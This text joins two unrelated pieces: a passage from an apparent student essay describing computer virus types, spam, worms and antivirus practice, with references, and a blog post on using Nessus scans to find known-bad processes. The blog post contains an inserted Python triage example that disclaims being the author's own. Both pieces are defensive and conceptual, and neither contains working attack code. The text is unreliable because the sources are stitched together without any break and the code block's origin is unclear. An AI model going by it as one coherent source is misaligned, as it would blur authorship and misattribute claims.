Moreover, the goal of a computer is to make the lives of its users easier, and macros offer exactly that. A macro allows the user to code a series of commands which are saved and can be executed automatically and repeatedly. These macros are usually used in Microsoft applications such as Word and Excel. A macro virus exploits the actual function of the macros and spreads itself to other systems. “Macro viruses are the fastest growing exploitation today” (Dulaney). In addition, there is another type of virus which attacks the system in several different ways. A multipartite virus embeds itself in the boot sector of the operating system and also attaches to all the executable files in the system. The idea behind this virus is that the user won’t be able to control it while it continues the infestation process (Dulaney). Likewise, a stealth virus also attaches itself to the boot sector of the hard drive. When a user runs anti-virus software, the stealth virus redirects the commands around itself, which makes the infection hard to detect. This virus has the capability of relocating itself from one location to another while the anti-virus software is in process.

Moreover, a phage virus attaches itself to programs and databases, but it also modifies applications. The only way to successfully remove this infection is by reinstalling the application, because if any file is missed the infection process will start again and spread throughout the system. Another powerful infection is the polymorphic virus. Unlike all the other infections, this virus encrypts part of itself to avoid detection, which makes it difficult for anti-virus software to detect (Dulaney). The polymorphic virus’s characteristic is referred to as mutation, because it changes itself often to hide from antivirus software. Similarly, a retrovirus bypasses protection and gets access to the system. Unlike all other infections that hide themselves from anti-virus software, a retrovirus directly attacks the anti-virus software installed on the system. Due to the power of this virus, it destroys the system’s anti-virus software so that it is no longer functional. However, the user continues to believe that the installed anti-virus software is fully functional and that the system is protected (Dulaney).

It is important to differentiate additional threats that are often mistaken for viruses.

The two most common troublesome non-virus threats are spam and worms.

Spam is defined as “copies of the same message, in an attempt to force the message to people who would not otherwise choose to receive it” (Mueller). Most often spam consists of private advertising and “get-rich-quick” schemes (Mueller). The attacker gathers information by stealing mailing lists and harvesting email addresses from the web. Most users ignore spam and mark it as junk to prevent receiving it in the future; however, users that open spam ultimately get overwhelmed by the amount of spam they begin to receive. Besides being annoying, spam costs the Internet Service Provider to transmit, which in turn costs the end user (Mueller).

On the other hand, a worm is different from a typical virus in the sense that it can reproduce itself without the need for any host. “Many of the so-called viruses that have made the papers and media were, in actuality, worms and not viruses” (Dulaney). The most devastating example of a worm is Melissa, which spread to more than 100,000 systems; one location was attacked with 32,000 copies in 45 minutes (Dulaney). Worms are designed to propagate using TCP/IP, email, internet services and other means.

Protection:

Even though it is impossible to completely protect your system, if proper procedure is followed the likelihood of becoming a victim decreases. “The best defense against a virus attack is up-to-date antivirus software installed and running” (Dulaney). Usually the systems that become victims of attacks don’t have updated anti-virus installed or don’t have an automatic scan set up. In addition, if you have multiple systems it is recommended that you install anti-virus software from a different vendor on each system. However, the most common mistake users make is installing two different anti-virus products on the same system. Doing so makes both products work against each other and ultimately provides no protection to the system. Lastly, it is vital that the user is educated on prevention methods. Regardless of how superior your anti-virus software is, eventually the responsibility comes down to the end user. The user needs to be made aware of the potential threats and how to protect the system from them. “They need to scan every disk, e-mail, and documents they receive before they open them” (Dulaney). Education is the key to protecting information security. In the corporate environment all staff members need to be trained on the importance of information security. This training should be followed by consequences for individuals who consistently fail to take information security seriously.

________________________________________________________________________________

References

Computer virus: the types of viruses out there. (n.d.). Retrieved September 12, 2010, from http://www.spamlaws.com/virus-types.html
Dulaney, E. (2009). CompTIA Security+ Deluxe. Indianapolis, IN: Wiley Publishing, Inc.
McGraw, G., & Morrisett, G. (2000). Attacking malicious code: A report to the Infosec Research Council. IEEE Software.
Mueller, S. (n.d.). What is spam? Retrieved September 27, 2010, from http://spam.abuse.net/overview/whatisspam.shtml
Neal, D. (2010, September 17). Cyber attacks growing in number and sophistication. Retrieved September 19, 2010, from http://www.v3.co.uk/v3/news/2269980/firms-open-range-security?page=1
Online threats. (n.d.). Retrieved September 18, 2010, from http://www.staysafeonline.org/content/online-threats
Parks, D. (2009, August 28). The common threats to IT security. Retrieved September 15, 2010, from http://www.articlesbase.com/software-articles/the-common-threats-to-it-security-1171518.html
Schwartz, M. (2010, September 8). Symantec finds 65% have been hit by cybercrime. Retrieved September 15, 2010, from http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=227300362&subSection=Attacks/breaches

Finding Known Evil With Nessus – Part 2

This post is a continuation of my earlier post about finding known bad processes with Nessus vulnerability scans. In this post I will share my experience after finishing my first scan using this new scan policy.

Unlike the regular vulnerability scans, this scan took much less time, because the scan policy consisted of only selected plugins. However, even with only selected plugins, the scan results were very comprehensive.

First, the scan results show the MD5 hash of the suspicious process. You can take this MD5 hash and search sites like VirusTotal, but on the scan results page you will also find a direct link to a Tenable website that provides additional information about the suspicious process. This information is similar to what you would find on VirusTotal, but with a little less detail. In my case I still searched VirusTotal for more detailed information.

Second, the scan results show the path where the suspicious process is located on the target system. Obviously, this is great because now you don’t have to search the system to locate the executable in question. But what’s even better is that the scan results show every instance of that suspicious process that the scan found. For example, in my test scan the same suspicious process was located under numerous user profiles.

With the above information in hand, you can quickly develop your indicators of compromise (IOCs) and begin your investigation. My initial step was to review all the processes on my target machine and identify the process ID (PID) of the executable that the scanner flagged. From there you can look at all the network connections related to this process, its system handles, any child processes, etc.
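The triage described above, as an added example that is not Tenable's code or this post's own: group the scan hits by MD5, list the paths and user profiles where each binary turned up, then find the matching PIDs in a process listing from the target. The Nessus output layout and the process list are constructed stand-ins (assumptions), not the real report format.

```python
import re
from collections import defaultdict

# Constructed stand-in for the Nessus plugin output described in the post
# (an MD5 plus every path where the binary was found). The real report's
# layout differs; this layout is an assumption for the example only.
NESSUS_OUTPUT = """\
The following suspicious files were found on the remote host:
  Path : C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe
  MD5  : 0123456789abcdef0123456789abcdef
  Path : C:\\Users\\bob\\AppData\\Local\\Temp\\svchost.exe
  MD5  : 0123456789abcdef0123456789abcdef
  Path : C:\\ProgramData\\updater.exe
  MD5  : fedcba9876543210fedcba9876543210
"""

# Constructed process listing from the target host: (PID, image path).
PROCESS_LIST = [
    (812, r"C:\Windows\System32\svchost.exe"),
    (4412, r"C:\Users\alice\AppData\Local\Temp\svchost.exe"),
    (5020, r"C:\ProgramData\updater.exe"),
    (3300, r"C:\Program Files\Mozilla Firefox\firefox.exe"),
]

# A Path line immediately followed by its MD5 line.
PAIR_RE = re.compile(
    r"Path\s*:\s*(?P<path>[^\n]+?)\s*\n\s*MD5\s*:\s*(?P<md5>[0-9a-fA-F]{32})"
)
# Pulls the profile name out of a C:\Users\<name>\... path.
USER_RE = re.compile(r"^[A-Za-z]:\\Users\\([^\\]+)\\", re.IGNORECASE)


def parse_findings(text):
    """Group scan hits by MD5 so every instance of one binary is one IOC."""
    iocs = defaultdict(list)
    for m in PAIR_RE.finditer(text):
        iocs[m.group("md5").lower()].append(m.group("path").strip())
    return dict(iocs)


def affected_profiles(paths):
    """User profiles under which a flagged binary was found."""
    return sorted({m.group(1) for p in paths if (m := USER_RE.match(p))})


def find_pids(iocs, processes):
    """PIDs whose image path exactly matches a flagged path, so the
    legitimate System32 svchost.exe is not confused with the Temp copy."""
    flagged = {p.lower() for paths in iocs.values() for p in paths}
    return {pid: path for pid, path in processes if path.lower() in flagged}


if __name__ == "__main__":
    found = parse_findings(NESSUS_OUTPUT)
    for md5, paths in found.items():
        print(md5, "seen in profiles:", affected_profiles(paths))
    print("PIDs to investigate:", find_pids(found, PROCESS_LIST))
```

The MD5 keys are what you would look up on VirusTotal or Tenable's page; the PID map is the starting point for pulling network connections, handles and child processes.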

Overall, I am satisfied with what I have seen so far. I think it is great that Tenable has incorporated these checks, because in my opinion it makes perfect sense to check for known bad stuff during the time you have already allocated for vulnerability scans. However, I would recommend that you keep your suspicious process data separate from your vulnerability data, because you do not want to alarm the system owners before doing your own investigation. The easiest way to do this is to create two different repositories and then draft separate reports/dashboards from each of them.

My final comment is that if you have Nessus (I used SecurityCenter), please try running this scan with the new scan policy. You can find the link to download this scan policy in my first post. Let me know what you guys think!
